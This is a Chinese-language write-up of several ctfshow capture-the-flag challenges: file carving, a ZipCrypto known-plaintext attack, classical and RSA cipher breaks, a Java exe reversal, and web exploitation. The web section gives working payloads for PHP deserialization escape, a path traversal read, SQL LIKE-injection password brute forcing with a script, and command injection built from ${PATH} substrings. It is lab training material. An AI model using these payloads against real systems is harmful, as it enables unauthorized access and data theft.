Misc

附加misc_問青天

下載附件解壓得到一個welcome.gif，

直接foremost工具分離得到一個加密了的zip檔案，然后一開始爆破啥的都試了都解不出來，后來出了hint

小姐姐聲音是aiff格式

百度找到aiff檔案頭為464f524d00，直接到welcome.gif檔案里找，不知道檔案尾沒關系，將之后的所有內容全部復制出來保存為1.aiff，

打開聽了10多遍終于聽清了小姐姐說的是歡迎ctfshow的小哥哥來玩，

將此作為壓縮包的密碼解壓得到一張圖片c.png，

觀察了一下，發現一圈都是由-|組成的，且都是8位(除了第三個是7位，感覺是群主不小心少畫了)，
嘗試了一下，將-當作0，| 當作1，
那么最上面的那個就是01100110，十進制是102，對應ascii是f；
第二個01101100對應ascii是l；
第三個只有7位，是01100000或01100001，而01100001對應ascii是a，
其實已經出來了，就是二進制轉字符，腳本如下：

s = '01100110 01101100 01100001 01100111 01111011 01100011 01110100 01100110 01011111 01110011 01101000 01101111 01110111 01011111 01101111 01100110 01011111 01100111 01101111 01101100 01100100 01011111 01110010 01100101 01100011 01101111 01110010 01100100 01111101'
s_list = s.split(' ')

flag = ''
for i in range(len(s_list)):
	flag += chr(int(s_list[i],2))
print(flag)

flag為：flag{ctf_show_of_gold_record}，

misc2_洗寰瀛

多虧出題人hint給的多

1. 步驟1預計時間為50分鐘
2. zip明文攻擊
3. https://github.com/kimci86/bkcrack/blob/master/example/tutorial.md
4. flag[0:9]=='flag{TriG' 可能字體檔案有問題

zip明文攻擊詳解參考文章：加密Zip包（Deflate + ZipCrypto）攻擊小結，

使用工具：rbkcrack，

因為壓縮包里就一張Triglavian.png圖片，而png圖片的開頭有16位元組是不變的，為89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52，
這里我們需要自己創建一個png_header.png檔案，內容就是由那16位元組組成，

開始攻擊

> rbkcrack.exe -C Triglavian.zip -c Triglavian.png -p PNG_header.png

-C 要攻擊的壓縮包
-c 要攻擊的壓縮包里面的檔案
-p 剛創建的明文檔案名

等了一個小時左右吧，能破解得到ZipCrypto的內部的三個key：be056038 0a143c0c 1ea08ca5，

用這三個key來解碼檔案

> rbkcrack.exe -C Triglavian.zip -c Triglavian.png -k be056038 0a143c0c 1ea08ca5 -d Triglavian.png

-C 要攻擊的壓縮包
-c 要攻擊的壓縮包里面的檔案
-k 剛生成的三個key
-d 最侄訓原的檔案名

就會在同路徑下得到圖片Triglavian.png

發現紅色字體很奇怪，長得就像是flag的變形版，

百度搜索Triglavian，發現是深淵三神裔字體(Triglavian fonts)，

圖片下載鏈接
字體下載鏈接

一一對照的就能得出flag：flag{TriG1aviAn_Techn0lo9y}，

Crypto

crypto1_中秋月

下載附件得到內容

fsskryenvkm~jl{ejs}jwflzsnpgmifq{{j{|suhzrjppnx|qvixt~whu

自動鑰匙⊕
明文全大寫，得到后轉小寫，并以_連接單詞，
題目hint

某古典密碼
經此古典密碼加密后，密文還是大寫
該古典密碼的密鑰形式：keyword+plaintext (+plaintext...+plaintext)

其實這道題一開始我就找到了是Autokey密碼，也用了網上現成的腳本break_autokey.py，
一些相關模塊地址：http://www.practicalcryptography.com/cryptanalysis/text-characterisation/quadgrams/#a-python-implementation，
單獨下載：trigrams.txt、quadgrams.txt、ngram_score.py，

但是沒跑出來，
一開始也一直不知道異或⊕的用處，后來看到群里阿貍大佬發的截圖，看出加密的字串不是一開始給的那串，懷疑是不是異或了什么東西，

然后就自己嘗試異或一下，腳本：

s='fsskryenvkm~jl{ejs}jwflzsnpgmifq{{j{|suhzrjppnx|qvixt~whu'
for i in range(255):
	res=''
	for j in range(0,len(s)):
		temp = ord(s[j])^i
		if 65<=temp<=90 or 97<=temp<=122:	#由大小寫字母構成
			res += (chr(temp))
	if len(res)==len(s):
		print(res)

得到

ylltmfzqitrausdzulbuhyselqoxrvynddudcljwemuooqgcnivgkahwj
YLLTMFZQITRAUSDZULBUHYSELQOXRVYNDDUDCLJWEMUOOQGCNIVGKAHWJ

然后再次嘗試使用break_autokey.py：

from ngram_score import ngram_score
from pycipher import Autokey
import re
from itertools import permutations

qgram = ngram_score('quadgrams.txt')
trigram = ngram_score('trigrams.txt')
ctext = 'YLLTMFZQITRAUSDZULBUHYSELQOXRVYNDDUDCLJWEMUOOQGCNIVGKAHWJ'
ctext = re.sub(r'[^A-Z]','',ctext.upper())

# keep a list of the N best things we have seen, discard anything else
class nbest(object):
    def __init__(self,N=1000):
        self.store = []
        self.N = N
        
    def add(self,item):
        self.store.append(item)
        self.store.sort(reverse=True)
        self.store = self.store[:self.N]
    
    def __getitem__(self,k):
        return self.store[k]

    def __len__(self):
        return len(self.store)

#init
N=100
for KLEN in range(8,20):
    rec = nbest(N)

    for i in permutations('ABCDEFGHIJKLMNOPQRSTUVWXYZ',3):
        key = ''.join(i) + 'A'*(KLEN-len(i))
        pt = Autokey(key).decipher(ctext)
        score = 0
        for j in range(0,len(ctext),KLEN):
            score += trigram.score(pt[j:j+3])
        rec.add((score,''.join(i),pt[:30]))

    next_rec = nbest(N)
    for i in range(0,KLEN-3):
        for k in range(N):
            for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
                key = rec[k][1] + c
                fullkey = key + 'A'*(KLEN-len(key))
                pt = Autokey(fullkey).decipher(ctext)
                score = 0
                for j in range(0,len(ctext),KLEN):
                    score += qgram.score(pt[j:j+len(key)])
                next_rec.add((score,key,pt[:30]))
        rec = next_rec
        next_rec = nbest(N)
    bestkey = rec[0][1]
    pt = Autokey(bestkey).decipher(ctext)
    bestscore = qgram.score(pt)
    for i in range(N):
        pt = Autokey(rec[i][1]).decipher(ctext)
        score = qgram.score(pt)
        if score > bestscore:
            bestkey = rec[i][1]
            bestscore = score       
    print(bestscore,'autokey, klen',KLEN,':"'+bestkey+'",',Autokey(bestkey).decipher(ctext).lower())

得到

-306.4154316738783 autokey, klen 8 :"KYIFZYWC", ondonhdougomhlalafnianstllbprigusstolddcmubadndaboughnewi
-290.9667615558167 autokey, klen 9 :"NHSZZCZEI", letundamainhafazilthaynemidekvaazrmaybowendcosforeidimprv
-252.5124922641369 autokey, klen 10 :"KEYFORFLAG", ohnoyoufindtheflagtheflagforyouisdoyoulikeclassicalcipher
-272.6830354332479 autokey, klen 11 :"QJTTBDRTGFE", icsalcixconssadosdestlamlnaforgusdispleingawlioncenteallb
-284.1217857757366 autokey, klen 12 :"ELAJWLRDEVRL", ualkquineyapassperthdasplywinefgadcornnoripioneowvistssov
^C

當klen為10時，ohnoyoufindtheflagtheflagforyouisdoyoulikeclassicalcipher，
結合提示flag為：flag{do_you_like_classical_cipher}，

crypto2_月自圓

原始碼檔案Baby(Don't)Cry.py：

# -*- coding:utf-8 -*-
#Author: Lazzaro

from itertools import *
from random import *
from string import *

def encrypt(m, a, si):
	c=""
	for i in range(len(m)):
		c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2)
	return c
	
if __name__ == "__main__":
	m = '****************************************************flag{*************}'
	assert(len(m)==71)
	a = randint(50,100)
	#隨機產生四位大寫字母
	salt = ''.join(sample(ascii_uppercase, 4))
	#迭代
	si = cycle(salt.lower())
	c=encrypt(m, a, si)
	print(c)
#3472184e657e50561c481f5c1c4e1938163e154431015e13062c1b073d4e3a444f4a5c5c7a071919167b034e1c29566647600c4e1c2956661b6c1f50622f0016317e563546202a

明文長度為71位，加密后為142位，
這里由于a不大，salt長度也不長，且明文m中存在flag，正好可以用這幾位去爆破出a和salt，
flag在明文m中的位置是53，對應密文c中的位置是105，flag出現的位置正好對應salt的位置，

f ? 1c
l ? 29
a ? 56
g ? 66

寫腳本爆出a、salt：

from itertools import *
from random import *
from string import *

def encrypt(m, a, si):
	c=""
	for i in range(len(m)):
		c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2)
	return c

if __name__ == "__main__":
	for i in range(50,100):
		for j in ascii_uppercase:
			si = cycle(j.lower())
			# if encrypt('f', i, si)=='1c':
			# 	print('i =',i,'\tj =',j)

			if encrypt('l', i, si)=='29':
				print('i =',i,'\tj =',j)

結果：
滿足encrypt('f', i, si)=='1c'的結果：

i = 52 	j = D
i = 57 	j = F
i = 62 	j = H
i = 67 	j = J
i = 72 	j = L
i = 77 	j = N
i = 82 	j = P
i = 87 	j = R
i = 92 	j = T
i = 97 	j = V

滿足encrypt('l', i, si)=='29'的結果：

i = 54 	j = A
i = 55 	j = U
i = 61 	j = M
i = 67 	j = E
i = 68 	j = Y
i = 74 	j = Q
i = 80 	j = I
i = 86 	j = A
i = 87 	j = U
i = 93 	j = M
i = 99 	j = E

相同的i只有67，說明亂數a=67，

然后拿著a去繼續爆salt的后兩位

if encrypt('a', 67, si)=='56':
	print('j =',j)

if encrypt('g', 67, si)=='66':
	print('j =',j)

最終得出salt='JESQ'，
知道了隨機出a和salt，這道題就出來了

from itertools import *
from random import *
from string import *

def encrypt(m, a, si):
	c=""
	for i in range(len(m)):
		c+=hex(((ord(m[i])) * a + ord(si)) % 128)[2:].zfill(2)
	return c
	
if __name__ == "__main__":
	
	salt = 'JESQ'
	si = cycle(salt.lower())
	c = '3472184e657e50561c481f5c1c4e1938163e154431015e13062c1b073d4e3a444f4a5c5c7a071919167b034e1c29566647600c4e1c2956661b6c1f50622f0016317e563546202a'
	res = ''
	for i in range(0,len(c),2):
		ssi = next(si)
		for j in range(32,127):
			if encrypt(chr(j),67,ssi)==c[i]+c[i+1]:
				res += chr(j)
	print(res)

得到最終結果：

now_is_7fad9fcb-d361-4964-821c-177c906b8d20_flag_is_flag{md5(now-salt)}

7fad9fcb-d361-4964-821c-177c906b8d20-JESQ經md5加密后為1efce62ee0a96e39149e2179db1dd04c
最終flag：flag{1efce62ee0a96e39149e2179db1dd04c}，

crypto3_多少離懷

# -*- coding:utf-8 -*-
#Author: Lazzaro

from Crypto.Util.number import getPrime,isPrime
from math import gamma
import random

def nextPrime(n):
    n += 2 if n & 1 else 1
    while not isPrime(n):
        n += 2
    return n

def getNewPrime():
    A = getPrime(512)
    B = nextPrime(A - random.randint(1e4,1e5))
    return nextPrime(gamma(B+2)%A)
	
p = getNewPrime()
q = getNewPrime()
r = getNewPrime()
n = p * q ** 2 * r ** 3
e = 0x10001
c = pow(flag,e,n)

#pA=6814157460586876042804041951834304833424062437744287469257313954502540797027261340622077218188033865281590529907571701131297782609357118357982463723982789
#pB=6814157460586876042804041951834304833424062437744287469257313954502540797027261340622077218188033865281590529907571701131297782609357118357982463723922147
#qA=7145646366857234331692232566211321498245533826533958883943688415057871253511271731661019642050252046201115975396366275083424623329930477623781348477881291
#qB=7145646366857234331692232566211321498245533826533958883943688415057871253511271731661019642050252046201115975396366275083424623329930477623781348477807457
#n=4451906216583258787166698210560165433649728830889954633721198623488802305844782492171757604711145165920462286487680020347239300947225371917344589502941576734875830871998499135120227347066586066943289430156378296665669974728569678779668142712266780949126509440672273927433367293606776081254094682033167575930701870261219046464773708974194213798032346187463443317770758989273370488582862531630356263732232300508706676725203199729764016766683870925164232508407363688370458877688991733322055785233669885166225464068579486683574954699370175267031949720967812902215635630884502987094547523361027411501285252862476410213277925430392164226297316310465146003494714018456407793759170649913180823814850170639706664167149612984905056804131124522209409607977589884632999710708045656852149371030046919242039957767777840304466948549383597755811307383659188216421501912831203089570725388153416013596114462069777713822433178099904907224119
#c=1996198968748552041728429851810599627895157160099076033250854211280074825148767841655949210593646824507865483166496070951130337321360509148527292165245205219296211294789087358959553387392928560150390604911087085313000622842025416521494799132969818997182731021267942464323979261593380113740152841984062184326431879167516288834455296913822921806893572566867611541664848820247889274979245086440402996661226884320574824077910315143756471444347386795428338020162169391827182914043434253974549636668126789355991920452920806351939782281969098470635517019120996509180703896707990501216102290302162705699788457579330150149320348175742131887213742989509004374645723471497302400169849858253644606818874098604333865973357374444445825761600866472906771935670261641342221394488068630591190697667016958881530367047928341661857241378511420562236766886349565409774340321441504290366223243635878057759623855735794209219474650425139791831374

hint

注意伽馬函式Γ(x)和階乘x!的關系式
威爾遜定理

要不是?Lazzaro?師傅放出這些hint，我一個半吊子肯定做不來這道題，

知識點

#伽馬函式Γ(x)和階乘x!的關系式
gamma(n)=(n-1)!

#威爾遜定理
當且僅當p為素數時：(p-1)! ≡ -1 (mod p)
推論：(p-2)! ≡ 1 (mod p)

#歐拉函式
若n是質數p的k次冪，phi = p**k - p**(k-1)

回到題目
我們需要求gamma(B+2)%A，根據伽馬函式Γ(x)和階乘x!的關系式可知(B+1)! % A，
而根據威爾遜定理可知(A-2)! % A = 1，
令x = (A-2)!/(B+1)!，y = (B+1)!，所以x * y ≡ 1 (mod A)，
而我們需要求的是y % A，y是x關于A的逆元，所以求x % A的逆元即可，
這里由于A、B相差還不到10萬，所以很容易求解出x % A，

# -*- coding:utf-8 -*-
#Author: airrudder

from Cryptodome.Util.number import getPrime,isPrime,long_to_bytes
from math import gamma
import random
import gmpy2
import binascii

def nextPrime(n):
    n += 2 if n & 1 else 1
    while not isPrime(n):
        n += 2
    return n

def getNewPrime():
    A = getPrime(512)
    B = nextPrime(A - random.randint(1e4,1e5))
    return nextPrime(gamma(B+2)%A)

pA=6814157460586876042804041951834304833424062437744287469257313954502540797027261340622077218188033865281590529907571701131297782609357118357982463723982789
pB=6814157460586876042804041951834304833424062437744287469257313954502540797027261340622077218188033865281590529907571701131297782609357118357982463723922147
qA=7145646366857234331692232566211321498245533826533958883943688415057871253511271731661019642050252046201115975396366275083424623329930477623781348477881291
qB=7145646366857234331692232566211321498245533826533958883943688415057871253511271731661019642050252046201115975396366275083424623329930477623781348477807457

e = 0x10001
n=4451906216583258787166698210560165433649728830889954633721198623488802305844782492171757604711145165920462286487680020347239300947225371917344589502941576734875830871998499135120227347066586066943289430156378296665669974728569678779668142712266780949126509440672273927433367293606776081254094682033167575930701870261219046464773708974194213798032346187463443317770758989273370488582862531630356263732232300508706676725203199729764016766683870925164232508407363688370458877688991733322055785233669885166225464068579486683574954699370175267031949720967812902215635630884502987094547523361027411501285252862476410213277925430392164226297316310465146003494714018456407793759170649913180823814850170639706664167149612984905056804131124522209409607977589884632999710708045656852149371030046919242039957767777840304466948549383597755811307383659188216421501912831203089570725388153416013596114462069777713822433178099904907224119
c=1996198968748552041728429851810599627895157160099076033250854211280074825148767841655949210593646824507865483166496070951130337321360509148527292165245205219296211294789087358959553387392928560150390604911087085313000622842025416521494799132969818997182731021267942464323979261593380113740152841984062184326431879167516288834455296913822921806893572566867611541664848820247889274979245086440402996661226884320574824077910315143756471444347386795428338020162169391827182914043434253974549636668126789355991920452920806351939782281969098470635517019120996509180703896707990501216102290302162705699788457579330150149320348175742131887213742989509004374645723471497302400169849858253644606818874098604333865973357374444445825761600866472906771935670261641342221394488068630591190697667016958881530367047928341661857241378511420562236766886349565409774340321441504290366223243635878057759623855735794209219474650425139791831374

#求 ((pA-2)!/(pB+1)!)%pA 的逆元，等于((pB+1)!)%pA ，等于gamma(pB+2)%pA
p = 1
max = (pA-2) - (pB+1)
for i in range(0,max):
	p = p * gmpy2.invert((pA-i-2),pA) % pA
p = nextPrime(p)
#求 ((qA-2)!/(qB+1)!)%qA 的逆元，等于((qB+1)!)%qA ，等于gamma(qB+2)%qA
q = 1
max = (qA-2) - (qB+1)
for i in range(0,max):
	q = q * gmpy2.invert((qA-i-2),qA) % qA
q = nextPrime(q)

r = gmpy2.iroot(n/(p*q**2),3)
print(r)

print('p =',p)
print('q =',q)
print('r =',r[0])
phi = (p-1)*(q**2-q)*(r[0]**3-r[0]**2)
d = gmpy2.invert(e,phi)
m = pow(c, d, n) 
print(long_to_bytes(m))

flag：flag{N0w_U_knOw_how_70_u5E_W1lS0n'5_Th30r3m~}，

Reverse

re2_歸心

下載附件得到readme,exe，提示

你應該見過python代碼打包成的exe，猜猜這是什么語言

本人是不會玩逆向的，但是看到這種提示，感覺是可以用工具直接反編譯成源代碼的感覺，

用IDA打開并按Shift+F12查看字串視窗，可以看到很多和java有關的字符

百度了一下exe 反編譯 java，發現說exe4j只是將java程式，使用自己的方式打包了一下而已，所以運行的時候還是會轉成jar來運行，也就是運行readme.exe會自動生成一個readme.jar，
直接使用工具找到這個jar檔案

用jd-gui.jar反編譯打開

直接出flag：flag{You_Win_0nce_You_C_Me}，

Web

web1_此夜圓

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

這里由于只能get傳入一個1引數，最后經反序列化后password==='yu22x'就能拿到flag，
而1引數賦值給的是$uname，這里就涉及到了反序列化逃逸，可以參考羽師傅的文章：[0CTF 2016]piapiapia(反序列化逃逸)，

#示例：
$s = 'a:1:{i:0;s:3:"abc";}de";}';
var_dump(unserialize($s));

#得出
array(1) {
  [0]=>
  string(3) "abc"
}

也就是說，反序列化出來就會把后面的忽略掉，
此題默認password=1，反序列化后就會生成s:8:"password";i:1;，
而我們可以自己構造s:8:"password";s:5:"yu22x";，

嘗試一下在本地傳入Firebasky";s:8:"password";s:5:"yu22x";}

$uname='Firebasky";s:8:"password";s:5:"yu22x";}';
$password=1;
$ser=filter(serialize(new a($uname,$password)));
echo $ser;

序列化結果

O:1:"a":2:{s:5:"uname";s:39:"Firebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}

這里由于我們傳入的字串有39位，把我們需要的password也給覆寫了

";s:8:"password";s:5:"yu22x";}的長度為30，而每輸入一個Firebasky被替換成Firebaskyup，長度保持不變，也就可以逃逸出2個字符，所以這里需要15個Firebasky就能逃逸出30個字符，
所以最終payload

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web2_故人心

源代碼

<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
    $d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
    if($d){
             highlight_file('hint.php');
             if(filter_var($url[1],FILTER_VALIDATE_URL)){
                $host=parse_url($url[1]);
                print_r($host); 
                if(preg_match('/ctfshow\.com$/',$host['host'])){
                    print_r(file_get_contents($url[1]));
                }else{
                    echo '差點點就成功了！';
                }
            }else{
                echo 'please give me url!!!';
            }     
    }else{
        echo '想一想md5碰撞原理吧?!';
    }
}else{
    echo '第一個都過不了還想要flag呀?!';
}
第一個都過不了還想要flag呀?!

題目hint

存在一個robots.txt

第一關

is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0

?a=1e-162，嘗試后發現數只要在-323到-162之間的都可以，

第二關

($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)))

跟以前的md5類似啊，用0e開頭的數，一次加密后也是0e的一個數和兩次加密后也是0e的數就可以，
后來還給了hint，訪問robots.txt，得到hinthint.txt，內容

Is it particularly difficult to break MD2?!
I'll tell you quietly that I saw the payoad of the author.
But the numbers are not clear.have fun~~~~
xxxxx024452    hash("md2",$b)
xxxxxx48399    hash("md2",hash("md2",$b))

腳本：

<?php
/*	//直接爆破
for ($i=100000000; $i < 10000000000; $i++) {
	$b=hash("md2", '0e'.$i);
	if(is_numeric($b) && substr($b,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$b = ';echo $b;
	}

	$c=hash("md2",hash("md2", '0e'.$i));
	if(is_numeric($c) && substr($c,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$c = ';echo $c;
	}
}
*/

for ($i=0; $i < 999999; $i++) { 
	$b=hash("md2", '0e'.$i.'024452');
	if(is_numeric($b) && substr($b,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$b = ';echo $b;
	}

	$c=hash("md2",hash("md2", '0e'.$i.'48399'));
	if(is_numeric($c) && substr($c,0,2)==='0e'){
		echo '$i = ';echo $i;
		echo '$c = ';echo $c;
	}
}
?>

能得到b=0e652024452，c=0e603448399，

第三關
php遇到不認識的協議就會當目錄處理，例如a://aaa/…/…/etc/passwd之類的，

url=a://ctfshow.com/../../../../../../../fl0g.txt

web3_莫負嬋娟

右鍵查看源代碼發現

<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->

看來是like注入了，
like模糊查詢可以使用%匹配多個字符，_匹配單個字符，
嘗試后發現%被過濾，不過下劃線(_)并沒有被過濾，
這里就需要猜測password的位數了，好家伙，竟然密碼有32位，如果小于或大于32個_都會報wrong username or password，只有正確匹配才會顯示I have filtered all the characters. Why can you come in? get out!

既然這樣，就可以爆破出密碼，
腳本

import requests
import string

strs = string.digits+string.ascii_letters
url = 'http://d274b648-0dad-4058-9b20-9a7a35424df5.chall.ctf.show/login.php'

pwd = ''
for i in range(32):
	print('i = '+str(i+1),end='\t')
	for j in strs:
		password = pwd + j + (31-i)*'_'
		data = {'username':'yu22x','password':password}
		r = requests.post(url,data=data)
		if 'wrong' not in r.text:
			pwd += j
			print(pwd)
			break

密碼為67815b0c009ee970fe4014abaa3Fa6A0，

填入密碼來到/P1099.php界面，

Normal connection表示正常連接
Abnormal connection表示例外連接；
evil input表示被過濾了，

嘗試發現過濾了一堆，就連a都過濾了，那就FUZZ跑可顯示的字符，看看都過濾了什么

小寫字母全被過濾，大寫字母、數字、$、:沒被過濾，
linux里有一個環境變數$PATH，可以用它來構造小寫字母執行命令，

嘗試構造ls得到flag.php，

ip=0;${PATH:5:1}${PATH:2:1}

構造nl flag.php右鍵查看源代碼得到flag

ip=0;${PATH:14:1}${PATH:5:1} ????.???

轉載請注明出處，
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